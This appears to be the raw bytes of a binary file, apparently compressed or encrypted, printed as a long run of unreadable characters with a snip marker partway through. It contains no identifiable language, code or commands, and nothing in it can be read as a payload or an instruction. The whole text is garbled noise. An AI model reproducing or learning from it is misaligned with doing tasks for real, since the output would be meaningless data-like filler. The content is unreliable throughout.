...p.G....j..x(~c.C.....}2'8.B..H...r...wa...].?....P..p...nu#c<.g.l.Gja!.X.1*..J........8....~...}M.X........F=.._.qk...{.5(4..]P.A.c....W...
Xe.i.b..&..H..3.5....@i.`..}...O.kr.........    L.J[,w|N...5i.......?.M...Jk...v....w.#.]....V~.*.a...OqHY.1.W.:    j,....F.....4M............_..zcg....Y3...D...(z'..}\.........ji...U0.G>.,...}..Z.../..7...p.....(ttR....' .. .C.. .........`..[.5v..y.w.b...k... .E^.IS*...V...&......%..V.!.@.S...D'..Awq.B...6.jU.pH.[P....R.......@c.......+..W.&.........9....h..n.HRc:."..?%Q.h.^.    ...&.CW.'.~ZO..$..L..hj5..$>.T...D....P.*.}.N..;..v....`.>kf.PQ...O'...._.u.]
@.)5.r&.e)bU..&3......\.F..4.....RI......U3...h.....:.Nf'.....~::.tw.2.U.K_mi..&..d.>."..|..>_. ..U.~9ui.t..6....}.!Pp.|-..R|pET$.q{.3h..X..4..._Z...H..E...2.......\,...#f.G.C...X........IVq...<..o..2.\7b.:V..p....1.g..f.......[xhLF.P.....\...r#.TN..Su%.S......i..V8E8.."....i.......#..K.~..<.R...<....$    ..V...N>;\.D.....6y....].o".pw.}........vO....._.rv. x..b...E..pt.......<...W5.0..Rf.....D[w.>..=^..=....7dW.a.:2d...
........w.rR...Vb..+..MK..k....j....Z.S...."..t?./b....B.9..-.+...{t.,xQ....#M...+(..BM...X..N.'..=.Yl....lh.^..{1.;s....7    .......0$.K.E...;.){..-I.....'..D4...O. ..n..= .R..n.....p,..l-...j..    l.`...8|..\N.}N2..    .>...|r..6.Z...-..q)'..4Y..5...ie.B.m.Pp2.`,.....L...1.....c^...._.A..E-...........=p.....+.....*...W.N.}O.Ak.~.1.G9.rA.{M...86B..\.]Oe7..}.V...T^..%.
p.B.&.....Hy..m....^.C/..r.....q...6Ie.'.......9.sv:.L...>.})...).p>. .....A.......2.lm.....U..}+...F{.9c...j"n.lD...;...IGr.'.
.m.p..G{..    ..E    #P0...:.1%..QjW..e./H.uD..N~O...v.j.....=.G.Ac..VT9L.%d..%F.S ...-$#o[....n.v.k.........)....?.V..?I?.0.Km.    ....(..PY....
.Y.B~[ ....    .O.....&..F#.p...EA/..%.....o.Z..wMhR....O......!t.. Q.b..\.['..N...K.Q....1..r..@...O.F.w......X.[w.1.|...D.b.W8J%.-V2@s...0$.....j[..%$..|.....!.    .Jc....[p,.a+%..........f.'e...U_....OM]......d..... ...a!....7x5B..qs...l.y8=1...[.M..k.........P....M&.,i...!...7..l..hc..i....p..4..Iu.f^/.dG%.........]M....(D..K...........8.f..B.Hh..A..3...~q..^.C..LJ.ZFB..q...m.uL.U.F.D.@1......|.&...o.g....fS0...<O......g\.r..]2x.v."U...C..+.=...J..73.3C...Q..B....&........C..3..5.^...d..?...Yt..,..g...A..+c.h.3..w....W.............=.\L.>...Jd0;]C..
.{Z.9A..%n{.z........."........Da.;.:..E...%0~p.....@.0o;Y=.U$}.Lj....v.g..vMr..p......5....B...o......f.........lx~...F*'I..sp.x...[Y.....C....X'..,.99,.z..U.jEAO|...)H..2.J......f...).......h...).......w..v...>.....ho...h..\.*..n.....f....*..#....:...........KY&........x.Z..C..Vo..n.....7Y....odq.C'.....*!..V3e\...c..:....h...@y.K.......&&J/.c.N....+..5...........LL9...&.,.k...Q8..!H..$.....TzI..t...`....%!.Ui..H9.........A....6..*...bm.t..2k.|7.......\.p.q..D........<...T.....p.6.(v.(.We..].*.q..9.......Wz1!9].2K...
...j...y....f.d...c..<c.f/.......3....q...du..~0"&Fo.G.<yL.=L.r.y..."$.+.."..~|.
...
...x.+..".*.O.)Y....E.s.w.IQ%..."...._.~...q......@.s_k.3.V.r_..x0~...`.D.....4.)k.............tc.%...B.......I%.@W.."N-@.:_..8N|E....=.)..T.z....:....x7.....o.F...h#.C5L.{..M..!..}R+bD..........R........8.E.'.@u..e!.z.C".b...%....gK....5/3.....m..0f..`.h5-p.hA$.K.%.Q....Hs....s..R2....>.?.N.......C%,....B..6h.._2...%xi...P~U<I..[.Y..kg...3....|M>.0.8...D
.....{...3e...ux...j.=.......t...H..Z..@...M..|.E"]..x.k..*.f...W.r.<........!.%D..}.........*.o w.
<.......)./......    M.&G.C.}P.L.l*.0.#..pO=..;EHv.....LL..XNg.........4<...../_...O".]+L.^..9...%F..>.J(ED.K.;.......s.RP..A..p59....V.h.(Y.8.d. ...mW......O...u.P..xo..........Kw..$....&^8...].'..G..db...jT.5|q.P..Y.<...>......}.E...M.6.b.m...RW....V?.....$...~.t.C9.{....#.MM....W....W.u..Bu.......?NW}......n.Z...K...).8.;(Z.9..z"......O..,......if.v.../../R....i..    L.a(..u...p.)0.t......z....    .&._}..3o..}...R.......vV.T.V.'n.<>....,...7'".Q.a..?.(..!...M...sf.8.X...%m..*.{.n....F...[    ..G....D_x{5...5........[Y....K.....Q..m.....+/Te}h.Dn.2b.[.:%./..'...:...._*"Uv.....{...*K09Q..vr..pe..:.XFV....t.G...W...%..S,.YQ)....+h...?.W.?.6\.YN7.C.R.+QA|..w.    ...J~*e.Q.@.....X.%.......B....r?.J.i.g...X...Wr(r.g    ..VA....1. {.8A.......i..-rNi9....R{.a......m....P...R........'.;.f..N...@.\Z.....5z...^N....PTR.<.J_..d=.o..kKi......a.}}........~.........2@/y.....N3....&.    ]...k......f....(.Y...!"*...&.(0..v.._V>?.....#.....V.\..'.Z...;.3(....Il<$.o.5p.b.F.....|;..t....=....)e0..>.....@f&|v...(x.....Ihl.[4..:.7.c..^1"EY?4.......G9.I.ol.d.X.].oc...........]...    .....+..?|uW6..GB....E? ..Rt..
3...j.._.y.0.CL~.7.N_\...Q..xk..|...~MM.PU...)....K^.03.!......a
^..DN.......5..k...H....r..e.e$.bR.#n).....@.jc...r....f.^T.tf.H.]j....@..!B.3.|cu...
..h.g./.y    !......W.wM.X8rh~.WS...."....#q.E.I.:....$.x.i3e.@...D....u.0.X.db.....5.{...

..7N..Bw&o...[..sX..D.".w.M?C@...n.At.8.c.."H~x...>..}...e.q......-p.H.....Z..
.....3..c!9.......>..erJ......!EelbJS...W,...m...7%..6E..[.3.....`F.Ra.v@..X....j?...TY..F.m.a.1m......".>..H,2....z...K.......S0$....O>.~..e.?J._ .F:...A.?...    .wn.5..N.i.1......D.f..y....L..|.d..gt.<KA3........d.Z.a......
.].W.    t<ID..op.=..c.3Er...\.d=.......$.......$....DtP...=5....F...:.;.{..#^{.......aY..~.....J_B.-....u.....J.!N-..0.9...p.Z3...-.....>H........s.$..6...fD.pp ..
.9N..S?..7l~w..d7..+.u..._/..m.DFz|.v.r...F...O..G..s...)%..S...;.......P.].........R..x.YF...T.
...#>[:..?~....1.7....5C"....@.........O......r.?H...._..w..`.c..p..6...W.{..'....Q...]P2.5....>.~z.rJ.W...f^B0.-.B..zN.[.Vx0]t..5...D..FlfGRv.{.O.;aI.x..F.e..\....6..J...i-.....L..    9#y..l...G(.........X.];A..5....E..9.....4    .1PM/].2....'......o7.:..e...*C.....VK.u..0 .n....m..E...T..n..UM.Y1a..ya.......EN4.....t..`....    ..1..b/..t......[..u.5x|M.Yc.rH".*,Zl.f'V........:[..D.p...<....?g<..Rq2....R8L9...?.......v....u.u9...).......^.........q........a........{w.K}....o^....v.Q:..^.1..D...{*....)..D ..8....<Y.....6...r%1'..8.3`.GK..&.7j...p.. .|.p<..r....-o.D.gr*q..U..DRr...@.^Nlc3...BH...<..0.".3{.../.#*k.{E<..-._#.!. ..]..3..<@....<K..jb.[...[EQ.U.....8.O....~0..Ua.....1=...i^}x.2...m.....O.$.l0-/-.....}%|\...@\~..Z.H...M..kJ`..pLF..~/_I}......mO.....t.X....6.W......u.....].h..`:.......wH...B1o.w..o.
..c.m_)..VJ.....b.=...I...w..6......p1o.^..O.}..!u..!..P.m5....U.IW....\O5......o..k.j..%.jI4...S....x....5..h..F.3fHp....O......C.3.W*......I...m.......S.P..c......v.....|5.......$+.........P.v..l...gU.....2U.f.@.....ZXB. ........t....nh........g....X....W..;.....wV8.Q2..j.GlX...p...:q.u.8...Xj..h..<....2.k..K........X.*[h.-.&..m.,..t)l..L.    .....U.?vp.v.Zmg.SB...h.&..s.p.k!e....q.F]E.5..!7....!...yS..M......e.'G.'.    X...|.........+....{.&aW..y.a..q.4/P8(h6...LDg..i....D)...f.=...s...P.i........Q.^+...(.....;N..]U..N.S...@../l...U~q..-Rr.0.....l..H.......
._..o..^.TC..e..8....[8a...%.L....G.S......%l......%...,...yF.P".FM......8@.."......s.N(..W..I)I.8l+W..d.
...sv..4.S..M".......E..W.7.-_................p........`....,k..W.H8..Z......d.....q..V.......^I8..8^[..).%./......A.._.WX...es..[...|..L.'.a...U...>.|m.A.o....&......\u:.>...........qb.e|oB....U...5....i.......
J^6l...+m..X..6...=KA!.2..j.........}./.Y....m.U.x.-..r.......4...J.........R.P....O8..cD.Y.B@f. ....qX...|....R....}....o$(.CA..(....=..$........>..A...w..-..8.0...~"..C~.-...+.L4K..`#.'TS....q.#.
;dn2. ....Gx.6.U<
}r........m9....,MI.?......[./.X...J.w.q.Z._.VP.g<......j..A..(.OJ.c.3..I."Pu...."....&.6gz...V...."...nI;...a.4......W]?\...v...Y.....^`L.."w.. .F.A.Z7..\ec..Q.}+.x......rk........._Q..oA..l.H..?.....S......B....@%.....fK-..4....X..as2-.aF.S.6.......x...B......d.'.S..K.Q.j..$_.~.6....+-...%^.~.j[8...I_..T$.V.(.....Q..9w2..    .p..B)..=..W.1...SC.....M.d..a..a..B.`..V...a.Z.fD.|e.."k._..R...D-..lr..h..P...I..N.xR.....J..s^.....t|R..~.    .|...q.9_b........F......z._..J..g..HV..z    .!e=..5.../bx...he..?...mr........j..j......p.]3A.nA...'..j.:....>(..}sXu....B./^..%"1.>.....hj..r#........=$.5n...O.L..6...F .D.']..1....a...5....}.F.o...O.B...t...a.
...rf..X.;..H....>8.....:.:[.Z...7S..$.....>.......Vj.c..........z..g..?...y...@.B..P...._......g.8.;.....\.<..?.......|-..{..^.{:..Q:[.V..s..c...B7}..Kt...R.!..B-......wP....J4.?J.(`......G.,9..A...\.S..{.c...^....q.J...M....:A`p..n..e...%..qd...U.-.<.H.D....N'...-.j.(......<w.?x.H4C..6.&...(..+......    .&.?2...........)o]....SA./@.....,&inx]...w..3..y.......Y*8..$..........Y.Y'9...$>
[g?.+.?.b.=.v...>..........3@........X..2...+...1..........{.../....I..t.3.p...8..]........M3Y...F. =..0...U..c..P...w......5;vq...?...m.o.@..|..x..[.Uh*..D.G.....+fu....xBf.c.n..%..X].......-......W.y.x..........^3.GyC.....,.'Y......#..!3z+.}.F.........`.. ..+....1...$h.en.\.V.t8.......q7..r*.0..c{G...6...B(..y......+....EI.n..q...2.......G/..|`    ......7J.........N5..&'......J.S.$..Cm..G.^?P$...Ij.b.r.)~o..m'|nFRI...^X..a-.....6.s,.YU....\Y...Mc...xZ.r........o.,...`...*.}... .(...24.....poY..#.............0.....Y.%.O..T6.e.Cw.?x.w.....9...9...Z.f..m.@.......-...MC.O$[8}.2...G...P..4e.p........_......~[f..4\.f....Q.^.....@....m./y.W./pcE1.g...v6..].U&b..t?#..K.I..k.~. ..<.....d.e*.WN.....\ !.n.C#....T`.A..'C...F`CQ.l{..D....|.XP..    ..g...X..PI...;.t7........H.......|...0..sb.B.6.k..:......z.t..2..X.:...B.T.{`..1e...K|2T..*.y.]...U..p...................x@.y..?T[b[.....n..cWqDK..........t.@..G..%    .;..2...VY'\.... Vg......)..DP..../Q...6.^]F[..D....M../..
.m..vK.d......@..}t...~...+aT....W..SL. .|P.....DpHrh..J...`rU...'s....|.S...~.3#Wo......K?.5..g..:V......]..-D&s~..b...E.dE.....
.y...1....._.Hi..].
.........../..n....v..&....%#.h=..h..... ..PRy.......~.0...........l3Q....P N.T..lN.ig......._...8{...sN.Nx..i.....Kwj......|_MW..x.... .S..02W.3.....|(.dk.. ..c-..{.......g.k.dHy.Ju..M..)+.u...OW...]4}>.Rw.M..P>...*9/_...~|"^.&.^%K..fl:zf.TBL...j ..m.0#..6^nI......o.4q-97.'o_5|.[.z.=Z{...Hj...#.w....F........[/.....8.1...s...^P(.~..}.7.d0.~nk*.m.T.Ya7...\.x..Q.    VI......E.B.Fo.G..
....y3k.j.$P........n.....T...E..u^..N...lt.O]N..8....7...C.9_........{&....PF.....{...Hd('twIs.t._.?.c.w.zt..P........O...i..4..W,...Y1.hXA.j.t.@\iW.<..&@...-...]\.T......t6H.;.#..E,...0.<L.....YE.[(.py...`L>a....x5.n....1T.abU.P.irI.W:..X).;79K/I_..;.:/2.8.......hX.q..2!./.SM.kf..M
u...,~......>.)Vy^............i....!Gj..y.......jb    ..HQ..."........B[....,26C..qd..2"_....9.    G.2e.."..}.Zj...$C...n...g..*.4kU.h.'C..o-..{TI... ...F...=Z)_r.....!\...h.1....'...J)....3J..W..\D..".fyz...g....T...&#.\......M.1....9..@Wp...$B.E....v.?...$.5...Hq.j_...W...zpWv&.d..f.#.3o.-.c.wd.`.A.O....._...&........,...B..=},.2?....5........s"..<]..'t
..|.0.W..3 k6........b:k..#.-.2...&...u+.Tw.+T..%|.......^..T....."I..f...4Y/{]2E.1..')..F...a.%!.j..C.r#F....... ...6.O....@.._p..........B.......;D....3.C.FW..j.n....x._..d.y5b...f.'..T........i~.}E....,.Q...F..Q..A........4..z.``.....Hp3.....x....wg/)..u.G.l..c....zM.....C.B>...D....K^s.Z\..TZ.1Q.L.\..V...S.?...w.V.@...P.5..q2Qg...........3...I.5.l)6..'.U.....`.v}U....-V!H...".}:8G..1..I.N|[<.Z.....AS...b.$.."ON...s.    .....9mLj.KBb>x........+J..Z.......t.~..!.L..{.    b~X..#X,......U^`w'.[.....X..c'..8..L~..c....}..Wc~....K.....9.>.[.|.n2...V.i.{...;..L....j...!)$....l.TV.@.Qb1]"......R..W0..8.:.B.. .m..H.........@..I.~j.....5..W6z..Y..v...e......?UM.@g.+..A}.Bo...,...R[.u..$f.z...)h...........i    ..K3tM3..q.......R...m....F..Y9.}1".H.....@..V.^.3"..2...F.+n.M...S....N}>...j5......z.6.Ti.MegT}a.m....c.....3......U
....Rz...Z].W..[f.k.....+.E......b]..I.1.8.....G.[....../.........K.TH......E.J..0........e6s.....j.........[_.0.>Q6..q...b..|..n......t.....j..%vh#...,.-S%..C,.....u../...!....2.,..Y.c}...q.H.. ;.t.}.H.k_<......p['.Y...<.D..B..A.......>.J...
C......".x.v.m.-8.20zm.wj.(U.3......JV....=vA..B.`K...d...7.D.r.s.!3..q..Oh..Si.y.<.J...../..^.k...-..bb..^^ 5...'m.).wd...|.....}.z.}A.c(..:..6.M%..M..H..W..:.6.-`%,,^h$....+..D....b.........B4h..d...B..(.^Z+.j....'.....'.*H......Lc....m.2..#~Y.3...n...&..Fj.~I-...yvl.A..O/....rx7..e.-....<................x.............N....S....y...:...x...9......O.7{.3.....    %.........jN4`5...MOh........a.&.(..r..].x9.z..+...<........7~p.=m..t...
.zGG..tl.v.
....q4a.....U...}-k.....^L...)+....j.:....|...
.c.......{>Y..E...'....i... ...6....y................rk...P((.KDi.{?h...q..M......xv.|.@.J3.,....|...\......1.,>.....#h...<d..3.P.0..*..K......a..5..............Q.......5.E@n......{.<ft......W.O.u..?#.Z..e...F..9...u=W6.4.qo..+.......D.......|..........n.@f.....w...0...L.2...Q.......OP..'..K...lI"0...2...tV..1t.MI_@.!..d ...G..M=.}.4.1._.r.3.k..K.3....>A.'j.".l.{u:.q.4.'..Y.t....4..x.O..9....{.h2KI;=.L.m./....t.3%V..9P.-.rv...F.}st_c.S+._&G...|]@(T....o.....}.e.Ju../g.
.....ut6.S.&l..d.q.$.a..W.Y..Gd..l=..l.......R.4...s..." H...5....N...c....w..E1...q.....^.h...>y.~].z.(K.....Yb.V.d.f.i2 1de..Jr;i...U...R.....pio...    .N..q...r..    ..n...Lf.kO.:.....1'.....0......W......GR&...j.6._.j.[..,....nt...".4...w.1.....y...n..[...tH....(........iF.P.....G....    ...$..*.lHE....    .~..._....<...t....,.s._....W..U.*.`c..%........)S.oSk........P..o...k.......TOc6Y.QG.v.u...;..H4..Y...Q......A...2$X."K.3K....R....m...x...e......w.......x.?..NY%..3.zI...0..Hw..B...|..0T.....&Wl.>..].fr...s.....xE..pv...i.i.v<..:/.......K..`?.#f0..tK.?a....P.g......Z=.#.a.U.......{....y.....8.........?anM..m..J.y...vu..5V.|...`".0.........f?..85L.n.k.......1&$."..g.~B..J.?..H.4.KC....QtF.Q -.g2.AU..n.<ML....UYFQ;...R.GH.....#32**    .
Z.
.d8)q"(.....[C..3.|S..-._...g+$.vD..$..Z.)."...{c.]..=..`...0.......z....e....}.y.N...1.(.....9~e...z..M..#..HCZ....d=......<+.,..'..Bl.....#|..~....A.fK....i.A>...K.I....o..of]......j.H..y..[.4r).,......."...    .....X."j...CJ.....OI.^:    .......6^.;.8...b..nR......`.].....L..P".....:.z.#..rPK.Qg8]..$. R...j..WN]....J.q.S.t.D..{..:f.J~...i...vJ..H.......q.QmW....n..........R..r.....3c..P..?T...'..$s'.E..%X35.V...._.......z.J...b[...J..Y....3..G..w....R."..&.k.&v..#..).Zs>&..p.....=.G....TF36...s.D.._.!u..6.    7............w........G...V......I-...S..jt    .......*`..DpQte.;..x......emB.'E...i.K/u&...^.... .#......?........1......P0.m.l......    *......    ...... S.....; t..R|Gm.D..Y=.u.... .-=_.&......'q_.y)...C.....r!z.k64.XI+..3..eY..v..>..v.i...p.....3.z.q~.hY.<n _7.a)4i5.@.....0_e..`.p.BH..z.>:.D%.{...n(u7...cp|g..u....9....I..f(..8*....;0..E...........r....$.oM.w..7..M..Li...D..f.i*c$..;h.2..+....\    ...*."/...........!\...2...5w..sF1.r..4G!...`.2.r.3.?<.Y9J...<.'..ujoo....................B.pO    ..&B\8..W.u......F.3......g?.......(..I..jh..r...".g........H    .@h..>..]..\&.T.".....Q)f.0..%..+...`>$Ym...0...t.3>
Y.`....
......y2.gw..F.....+..ar....,b6    $~...-....W.........&..6(8.D.03..L.p...b.t....%.......T.>H#F...$w.V...<..)a.b..g...Q...P.G.P'o...n.....3...<..G*.....M.=O......J...B..7....'.......S.^...x~m...<    .~......*..l-...n.....(.)[h..@.WE...zU.......:T...^7....\.{..}...(d*.d.dA.(-qi.>1......C.+..gxk....K4..%O~N..u..Q....W....%A.1j...'.c.u.....8o..1$...B..|.#.... ._....q8.N.!.x...-...!.P.y..t.d.J....6....<K..:w;.G.yoX..s.J......$u.9.G...yZ...j....3...M.1t=.-..........r)...c.*\X.N....6C.fV"....a.c.....|.w'.e..B......16..u?.0&9.l.......>.<.?<.}U+d.=.8...`I:..\...[).:!...[h......tT^..+,.....3V.('.O.Fk&.A...C@(t.{..u..+.......c..?........./...DY..2....o..T+.-.......:.:;.....A*.B....-.A3,Og.\.:..f.x@.H.9.d....`...t.Y9x..l...+..../.bE.?@Y..8.._..........s..
Y......^g.|(..........2.z..S......    ..`.!A....m...-.m..h...&..@i........$....q..#..m.:.."    .QN.a....ZF.^.:.Hl....,=. .U0...(..\..Ru.E1.......F...^..6.Tm...4...b.Yd..BP......%f..@.......k//.J...`=...i..!)..i.?z.3E.cS.......5...xD2/)X..j..w.....W...J...~..a......B..VJ.....M..sg.J...,..2.".n^2.G.5....;....9.n.../V9^.d....l....c..|......b.]./....q..h..\V/..X.sX.]...z/,.    ..7.g.T.U..t.......e..f    ..W9...2.H!..dxr....g
.*....G......S.y.O.Qsw...Yw]..*H......E....8.....U.W..v...+.%.h.z.$...vM....o... G,/...b0u....^`..>lK....b..
....(........4T`4.v.J.R........@.u....9S.93.!0H...o..3`..LW...a/...0=2 ..+..z..~...`..a.F=..+(o.p....V(5..x......;......".....C...X...2..|k...u1;.Y~@..*....9G.5..g..P    c...X    .J..xVy..w....B..u. ........}.1...<....'o5.........'_...\Ul.7...d.M./.....!.R.<.........WF.d..........`s...;..aT..QH........R.J...Xm...EE.(.....D. }..s.......>...&f.m..sM.2......+8.7Q..B....C`.F...f...o..........LZn..[....x...l...c......_^.y..{q..,..3...10.1`.9.n.1}.....N<.AI..w...ra5{.j...0y.R.M....g.e...p.....Fik......HS..c&.j.%.....gnq.!.v.U$..E..,km...D..c.r.h......Rc(wu...........(.?9.B..m....3.D;kg..-4....24..`D.h......R...=J.F..LB...P.?>.........Z..
W.)K.O    ....*(!d.^.$D)Cm..{..>
...[SNIP]...
<e. o...F.kI..6!+.....    w.G4q/.Y..bw..7....Z.Au...q.....I....s`GD).....a,...{.....G.....O2..........GE=r...0
...F9mlD.........2.......Y9[.....;N......!.e..gn.R.............5.e..z......N.|:%}.<?..k..N.f..1YS....<_P..Y..o @..0R.....6kH...O\.8K."o;........[.
0N?[...&^'..s..2D.......o=.....I4>2..MO.a....!....T>.E"N...P....
..}....a.1.i\i0.",..y...dJ}....
G......C#.v..xG..R.d<.....]....`....P X....J$"
8q...'*..m....Hl.............lC/w.ne...<-.&.....%.h...^..6......,.".u.O.    ......T.....I...0..^P.q.n
.v^....R.PGM...Q..h.e..R.*..}.....tA.....{....PGg..f.....(..Jj....%3...:f`.'...s
..A*.....^.SuOF..N..(...J ........9T]h.4*...Z^.......k..\..6E.5..\.g...J...].......!..;.%..&....aC.|^..<_oE>IFx..0...!.>&..O.vJ.)0B.....i.......%D.c.w...j.[b.!.).NoSD.3..;S...$..Cy..[.J..G....$mQ.0....-..[NW.....`p.....W.......$.V....vu.<    ......    nD..}.dVyybmIf3.}I.6....o.@..v.WFPE....#.......N...$..|...A.h...'..},.....3..".RZ...A..|....9...B.G......>eV~f...`.A.9.v'......MS.`    '..>...r.......?.9A.|.TAWA...W..L.-B....7..3........i..I.u.....b..
aw...shb.<{.Cyl...cbT..6.+0...;...U.nV..n~.V.aAq+.Y....(^..$....e. ....Awz?!Y...T ..`.t..[=.".k.G...4.d...q<.\.wiYS<.....8z..s.1...+..|...o    u25G.!g..&..x...f....Q)E...~E..9H..B..I....dY..;v..    '..*..UtY........?.%....\..k[/Q..o..7........A#B..p...L....w! ..V}FL...........5o5.xc..(.iX..^.D.e.-O..a..5.7".
9..I..[.yj..".Rq...........O../g..Y8.....$i...p3....ws..h.5t.P...s.E..k#.....`.l..._Y!h.|).W.r.......9V.,    ..H..c....=E.....F${Q.VQ....x..(:..A.^e.r.........F_:N5.w.?..=..e....h........8..i......b.,t...i..-TI
A.....!.......5....H........4..u.B...~....IL.C..k.h).l.m........K..'RO.2!.....f...]..x.T....0.y.u0.h.XP.q...i.I.D..7;x[.KL.J.5....6.....]$;>    Y73..~S.........CGT..p[l.&T..H..|.j.?f.4...K8S..@..y..H:...R<}..R..t..g.....rl._V....."~.:Tw..iZ...'.y....*~....\.Yz.Jf....$u.@.............`..._B...3.b..........W...BdL...z...".....m..v#..j....MO.<....].j^.....Z....|...y.Nd....$
.-..3.!8B....v..54..>q..>.l ..B).~...y...@2.....P...M|...zCI....W..U.D....?3..5.$...."..I.W.x..!.g.........F..YR@.{WkL=.P....rd}I.a..0.s...
..r....<l.....
....Z..........."..KC.H.Ne..0...{......eq..7...2_.r.{0..Ey)*.............B..\3.C0.......w..G6.....X|....0..s.fED....@2..E...C3........p.$..Yd...0.!z..Gd0....k:).E..../H..b;vP.e.....ag....y.L.;9...9....).[P........$.~6... .(...........<.....?.$i.<..}.|..Sh....3F0$'.^I.b...O+..&.....r.g.kS.MB...........4.b..aqPh...xs|.....g.U.........w&co....p,....c..;r...#.....?X]..9v....X.:..6..K..-`^.TC
.$.=..n...!b..Ee.2...n.,.u...i.;..R.q,.....k~j.
..t+FPa.B%[..x...6..b..-.0..8.....^.[,3...?..    }.t...vOW...z&...fi.>.`...P.)).s.-.....Z    ..#.......T..?..|U..Nq.|.......7.9j....-..e..........&0.dSZ..Z....j+K..%V"?........\=......Y.]...l.@ab..O.b.-.o..X.K...I.v..D.l.Y.+.PN`.B1.."'z....44dJu.F..j..\/n..E... 4.O...0.(...F.-....m...:."i.f....S8...g...    7.u.a.|.F.OD..g..NT+.5....".{^..|...g.M~.z.!....#@@\..F`j........qm}e..,....N........WX.'..{.3./...!)...2....Z...d....8Zkm1..eu"x.:...BDn.A...y}7.0..$L..%=.`@.....4g..z......h..2.._...........U..].........m...\....})..<..|T.`..Ah....NF|.....T..J..a$f...8......wb.*j.u.o.kw.G.....m ..#g...Y....bu.A.^D..#P..h.32.......wueg......6w.*..w{\v...+...E.....o.>..Q.2.{~...8.....0p.;................i..........Q..ar...t@+.<@ml.y.&B.i.../0,..P.5.[. M:...ipf.$s.-....F...~1...
>.P..x......+..-d\....S=z...9.UJ...Nfa...Gyb..w..%A.j..q....F..x....5..D.-.Z.. ..*.]G .....HZB.N.F/<......`7-...x.~...`...a. u.'K.l...s.......p.iC.'D.....MT.pwi...V.J!...i.$.P..I....v.H...U..7.7L.oN_.x.w....f.qp.$..D....L....{.D..7BS
0."...pJ.g..ppy........N.....[.)g...@*3O..........>...l.....G<(M4....N.:.jF.r\E....'.P...j.k`.E...2V....(.....qa...8.0...*k....m.....&.....g;o..!..".E.. ......j.D..-H.Q...;....p..@..I....Nz.....f..8..d..X2....g%.j...q'V.J".^=p.D..kG....7`.e`.w0../..Y........O`...-..%?..Lk{.c.I...D..5.$.Yy
O....qTo.C.D.h...l.....on......t.mGzug...:....v.N>...R..>m......(...}.B.........j...R ``...    ..b......>....y...q=...T.Y.......1.~...Q...@>..I.JW<.....6)...S.f.....'.@?.>.#...1'......q...`...y$p.w./.y.u...*].
.%W.R...xl..7.Y....Jn........u~o.:_.Wy...t?. ..$..*qD.< g......2.U    ..XE...ThU<..RC.B.l&.B.....Y0...:..<&C)g.e..o..t..R.......)|..]..Om..............12....>cYT.y...6.,7.#..L.@V.%.).it}.......Z..`x    ...R.X.`.l......0=..6    .p*!b...2Q..;.X.+1....]a..F....f.2...QI..~?.zt.aR..F.r...
zx...I.. ).3....1|B.n......M..s.`W.....Eqn..|.....O...-@A.....V*.`].X.}.gda.c{|xUB..D ...s)&./NF.Q,w..,....v..(.....;TBh.`..X.w.^UF......Fg.,.'...Mgc.P.LA.bT.7=6<l....5=...i)...l.."........$...8.I,....4.......Z..i.H..)...P<....sM.F.i%. b..DS`Wt..-.j.k.h.4..E.../.+s.C(m.-..".i.J..._..Or...|..l.3LB.V..z.h.xN4...'|$.0H..t..pW.L.(..:8!T....Pz.;H....av]8Q.9.7.h...jF. .B...<..M"u.    t.(....._0.=Y-.....4.nZg.H....b.d..+.?v....t......../C..'..?..2.@r..1..'..BL..SG....GE.4...1<}..%..`....r......r.|..&t..w.I+eu.-. 0...)?...A..3..1i..@g1...0~....{....*......Gr...Z.^.F.....I..1r...,...f8.X..4p...k....{....v......G.I..8..[.l;.uta.2k....x.S.............Q.Q.P..OU.<I....%..Wz..7.G....4....L..0Ps...._.>E.5......b.....x...C..c!._..
...D.^'.Iot
..}....l
&.5.-fM...+.3K ..N.....H.(D=..w.......[s............4..q..-s=..!..........z.........E)%    #...Vtl.,..{jS].;SM.......S...8...I........<8...xLC....z.u....
Q....x....g..........}~/.r.u.#f4*.(<.../._6_j?p{v.RBg.....>v.B..Q(,.st
.A..&'..m]...-.pA..M.;.@..(..*.F...yQa..%o..*P.^..V..$.........j...q..q;6r.,.`a..+......-5.u..i.C.b.At.g.=...).n...DEnus.......r...9...E.7....DOJ.....]..8N..n...@.L.O..3.=.!    ..........27......*....v....%k.+7F\..P..1..`.'3......^.l..-].R].;..Y.}.M    s[...^N....S.j.3......ExI......OM..+    ......8..
{r.u......uV....o...4.ogfs.>:m...c.6.!..%8^X.Y.az.mM\..%.......a.......,...$..+............0.p...1....n*j@..J*,y",.5/.+...)..}.*.aT;........e,..;.......T."...b..^nn..Z.w...,...L.q.....|Y3..:....~T>v.....$<....:.%.l....Q..
....&..}1....v...+..K.@Y.8......-..`......9....f2..K..6OTxw..[../..x(6....9!.._..P....$.-k..9.    QhjlO..).J.....Y..m.%v..gK...J.A9.]....b%...I......w;s..Y.'.b...O..`.{.Q.2.2...G..j<.yH....w^C.0..i....f.nQ.n.7.Q.0E...S^.+..|!..Z.{.j.}-Kd.-.......SMx...3..B..f.9&....r?.K+...E..u.....Dp.._...J.....".>3
cmJO.....T.....z......}AV>....?.p../.1.R....*..r...Q2.(..y.IS.Ldv.ca...oPK....+g..hxh:.....-...
5..k.D.Z!X|.b.\Ed%...3.O...9..=...L;..%D0F.........H....Ggm....@^.i=.
F..........C.....(......u...$...G..........U+.....P.#..}.7.d
... Y..<~..4..}-...4l;......]..=..&7b0...,"..7%yP...mgH/^.........].|g...R.....E._.....CT...Pa#.E$K.....A.6.H....X>..r    ..$..
..=5.&.oj.3....c.YzzH.......&:...Wo.B...{(g..[...%.V.B...I.#..X2.{.Z.....<.....`......s...J...cpf....z{..,>../K....| Yb.B,...T...R..J..Q4!..!./....X.....q..0..k.u..[.. ..H..(~."..I. .W..
(.U...$HW.....z[...xh.T.....W..g.^..@.&.f+~.....`.....#....]r.JXb.N..%..G!%~.i....}p.e...*./z..?.0D...*=.....u...uF.ML..&..d-Y.?F....o.s$&j......x.[.....f......oz....NC..i....@.o..!2..-.F.2........j^....n...G......s.&.#...e...|.    ..\.,..ce}mj}.,.}n.cPy..z.iU.)N`...jNnC...M1x...W,x..f..M./y].d......p......['..$.yjD. -..H.{..d...2....    iqcNr......x..o..sf.. ......@k../..    .r...x..[............-bj<..I;.F...G~...=.hhj....;.u........2YLoh....
.;..........5...}..N.?.RSUr/....Y,i......1q....u.}4b.7.."Q.s..N..+'....7V.3H..7.~.a.......B.J@_.Y.A..Q5..a....o........B.O.L.c...5J.......?).|*..!T.B7....z....m`..7@.@.....!..0.b.....$.....h.\.`.F..L.A..3..1.p....e..OU.n.~.3.N........UR!!ab.
